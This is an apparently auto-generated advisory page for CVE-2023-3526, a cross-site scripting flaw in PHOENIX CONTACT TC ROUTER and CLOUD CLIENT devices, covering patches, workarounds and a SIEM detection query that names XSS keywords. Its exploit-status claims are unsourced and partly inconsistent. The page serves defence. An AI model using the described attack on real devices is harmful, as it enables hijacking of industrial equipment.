CVE-2023-3526 – CVE-2023-3526 is a cross-site scripting (XSS) v... (How to Fix)

Q: What is the severity of CVE-2023-3526?

CVE-2023-3526 has a CVSS score of 9.6 (CRITICAL). CVE-2023-3526 is a cross-site scripting (XSS) vulnerability in PHOENIX CONTACT TC ROUTER and TC CLOUD CLIENT devices that allows unauthenticated remote attackers to execute arbitrary JavaScript in users' browsers via the license viewer page. This affects organizations using these industrial networking devices for remote access or cloud connectivity. The vulnerability enables attackers to steal session cookies, redirect users, or perform actions on their behalf.

📋 TL;DR

CVE-2023-3526 is a cross-site scripting (XSS) vulnerability in PHOENIX CONTACT TC ROUTER and TC CLOUD CLIENT devices that allows unauthenticated remote attackers to execute arbitrary JavaScript in users' browsers via the license viewer page. This affects organizations using these industrial networking devices for remote access or cloud connectivity. The vulnerability enables attackers to steal session cookies, redirect users, or perform actions on their behalf.

💻 Affected Systems

Products:

PHOENIX CONTACT TC ROUTER
PHOENIX CONTACT TC CLOUD CLIENT
PHOENIX CONTACT CLOUD CLIENT 1101T-TX/TX

Versions: TC ROUTER and TC CLOUD CLIENT versions prior to 2.07.2; CLOUD CLIENT 1101T-TX/TX versions prior to 2.06.10

Operating Systems: Embedded Linux-based firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Devices with web management interfaces accessible to attackers are vulnerable. The license viewer page is typically accessible to authenticated users, but the XSS can be triggered without authentication.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator credentials, take full control of affected devices, pivot to internal networks, and disrupt industrial operations or cause physical damage in critical infrastructure environments.

🟠

Likely Case

Attackers would steal session cookies to gain unauthorized access to device management interfaces, potentially modifying configurations, disrupting network connectivity, or using devices as footholds for further attacks.

🟢

If Mitigated

With proper network segmentation and access controls, impact would be limited to the specific device's management interface, preventing lateral movement to operational technology networks.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Proof-of-concept exploit code is publicly available. The vulnerability requires minimal technical skill to exploit as it involves crafting malicious URLs that trigger JavaScript execution when visited by authenticated users.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: TC ROUTER and TC CLOUD CLIENT: 2.07.2; CLOUD CLIENT 1101T-TX/TX: 2.06.10

Vendor Advisory: https://cert.vde.com/en/advisories/VDE-2023-017

Restart Required: Yes

Instructions:

1. Download firmware updates from PHOENIX CONTACT support portal. 2. Backup device configuration. 3. Upload firmware via web interface or CLI. 4. Apply update and restart device. 5. Verify version after reboot.

🔧 Temporary Workarounds

Network Access Restriction

all

Restrict access to device management interfaces using firewall rules to only allow connections from trusted administrative networks.

Web Application Firewall

all

Deploy a WAF with XSS protection rules to filter malicious requests before they reach vulnerable devices.

🧯 If You Can't Patch

Isolate affected devices in separate network segments with strict firewall rules preventing external access
Disable remote management interfaces if not required and use local console access only

🔍 How to Verify

Check if Vulnerable:

Check device firmware version via web interface (System > Information) or CLI command 'show version'. Compare against affected versions.

Check Version:

Via web interface: Navigate to System > Information. Via CLI: Use 'show version' or 'system info' command.

Verify Fix Applied:

After patching, verify firmware version shows 2.07.2 or higher for TC ROUTER/TC CLOUD CLIENT, or 2.06.10 or higher for CLOUD CLIENT 1101T-TX/TX.

📡 Detection & Monitoring

Log Indicators:

Unusual access patterns to license viewer pages
Multiple failed authentication attempts followed by license page access
Requests containing JavaScript payloads in URL parameters

Network Indicators:

HTTP requests with encoded JavaScript in query strings targeting /license or similar endpoints
Traffic from unexpected sources to device management ports (typically 80/443)

SIEM Query:

source="device_logs" AND (url="*license*" AND (param="*script*" OR param="*javascript*" OR param="*onload*" OR param="*onerror*"))

📊 Metadata

CVE ID: CVE-2023-3526

CVSS v3 Score: 9.6 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CWE: CWE-79

Published: August 8, 2023

Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-3526, you might also want to check these: